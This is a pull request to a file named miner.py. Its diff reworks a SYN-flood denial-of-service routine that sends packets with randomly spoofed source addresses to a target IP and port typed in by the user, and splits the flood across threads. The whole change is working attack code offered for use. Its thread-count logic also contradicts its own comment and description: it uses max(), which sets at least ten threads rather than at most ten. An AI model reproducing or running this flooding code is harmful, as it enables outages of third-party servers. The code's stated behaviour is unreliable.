### PR TITLE
fix multithreading

### DIFF
--- a/miner.py
+++ b/miner.py
@@ -58,19 +58,20 @@ PORTS = {21: 'FTP',
          25565: 'JavaServer'}
 
 
-def syn_flood(dst_ip: str, dst_port: int):
-    ip_packet = IP()
-    ip_packet.src = ".".join(map(str, [randint(0, 255) for _ in range(4)]))
-    ip_packet.dst = dst_ip
-
-    tcp_packet = TCP()
-    tcp_packet.sport = randint(1000, 9000)
-    tcp_packet.dport = dst_port
-    tcp_packet.flags = "S"
-    tcp_packet.seq = randint(1000, 9000)
-    tcp_packet.window = randint(1000, 9000)
-
-    send(ip_packet / tcp_packet, verbose=0)
+def syn_flood(dst_ip: str, dst_port: int, counter: int):
+    for i in range(counter):
+        ip_packet = IP()
+        ip_packet.src = ".".join(map(str, [randint(0, 255) for _ in range(4)]))
+        ip_packet.dst = dst_ip
+    
+        tcp_packet = TCP()
+        tcp_packet.sport = randint(1000, 9000)
+        tcp_packet.dport = dst_port
+        tcp_packet.flags = "S"
+        tcp_packet.seq = randint(1000, 9000)
+        tcp_packet.window = randint(1000, 9000)
+    
+        send(ip_packet / tcp_packet, verbose=0)
 
 
 def ddos_threading():
@@ -78,10 +79,13 @@ def ddos_threading():
     dst_ip = input("\n               Target IP: ")
     dst_port = int(input("               Target Port: "))
 
+    thread_count = max(int(counter ** (1. / 4)), 10) #thread count is root 4 of packet count, maxed at 10
+    packets_per_thread = int(counter / thread_count)
+
     print("               Packets are sending...")
-    for i in range(counter):
-        ddos_thread = threading.Thread(target=syn_flood, args=[dst_ip, dst_port], daemon=True)
-        print(f'               {Fore.LB}[{i}]{Fore.W} Sent packet to {Fore.LIGHTYELLOW_EX}{dst_ip}:{dst_port}{Fore.W}')
+    for i in range(thread_count):
+        ddos_thread = threading.Thread(target=syn_flood, args=[dst_ip, dst_port, packets_per_thread], daemon=True)
+        print(f'               {Fore.LB}[{i}]{Fore.W} Sent {packets_per_thread} packets to {Fore.LIGHTYELLOW_EX}{dst_ip}:{dst_port}{Fore.W}')
         time.sleep(0.001)
         ddos_thread.start()
     print(f"\n               Total packets sent: {counter}\n")


### PR DESCRIPTION
thread count is calculated using the root 4 of packet count
eg.
- 1 to 16 -> 1
- 16 to 81 -> 2
- 81 to 256 -> 3
- 256 to 625 -> 4
- 625 to 1296 -> 5
- 1296 to 2401 -> 6
- 2401 to 4096 -> 7
- 4096 to 6561 -> 8
- 6561 to 10000 -> 9
- 10000+ -> 10